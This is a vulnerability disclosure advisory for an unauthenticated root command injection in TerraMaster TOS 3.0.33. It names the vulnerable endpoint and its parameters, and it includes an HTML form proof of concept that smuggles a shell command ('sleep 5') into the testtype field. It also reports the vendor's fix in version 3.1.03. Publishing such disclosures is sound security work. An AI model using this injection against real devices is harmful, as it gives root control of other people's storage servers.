SSD Advisory – TerraMaster TOS Unauthenticated Remote Command Execution
Credit to Author: SSD / Maor Schwartz| Date: Sun, 22 Apr 2018 07:50:33 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope
Vulnerability Summary
The following advisory describes a unauthenticated remote command execution found in TerraMaster TOS 3.0.33.
TOS is a “Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.”
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
The vendor stated that version 3.1.03 of TerraMaster TOS is no longer vulnerable to this vulnerability, the latest version of the software can be obtained from: http://download.terra-master.com/download.php.
Vulnerability details
User controlled input is not sufficiently filtered and unauthenticated user can execute commands as root by sending a POST request to http://IP/include/ajax/GetTest.php with the following parameters:
- dev=1
- testtype=;COMMAND-TO-RUN;
- submit=Send
We can see in the source code that the value of parameter testtype will assign to $line and will execute by shell_exec()
Proof of Concept
1 2 3 4 5 | <form method=“post” action=“http://IP/include/ajax/GetTest.php”> <input type=“text” name=“dev” value=“1”> <input type=“text” name=“testtype” value=‘”; sleep 5; echo ” ‘> <input type=“submit” value=‘Send’> </form> |
